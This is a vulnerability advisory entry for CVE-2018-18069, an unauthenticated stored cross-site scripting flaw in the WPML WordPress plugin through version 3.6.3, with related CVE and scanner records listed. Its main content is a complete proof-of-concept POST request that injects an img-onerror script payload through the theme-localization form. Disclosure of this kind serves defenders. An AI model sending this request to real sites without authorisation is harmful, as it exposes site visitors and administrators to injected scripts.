Lucene search
WpvulndbWPEX-ID:024B43D3-1E73-47F1-81D2-AB15A6C7B0FDHistoryOct 08, 2018 - 12:00 a.m.
WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
2018-10-0800:00:00
wpvulndb
42
EPSS
0.001
Percentile
40.5%
The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability.
POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close
Upgrade-Insecure-Requests: 1
icl_post_action=save_theme_localization&locale_file_name_en="><img src=x onerror=alert(1)>Related
nuclei
nuclei
WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting
2020-05-14 17:54:02
prion
prion
Design/Logic Flaw
2018-10-08 22:29:00
cve
cve
CVE-2018-18069
2018-10-08 22:29:00
cvelist
cvelist
CVE-2018-18069
2018-10-08 22:00:00
wpvulndb
wpvulndb
WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
2018-10-08 00:00:00
nvd
nvd
CVE-2018-18069
2018-10-08 22:29:00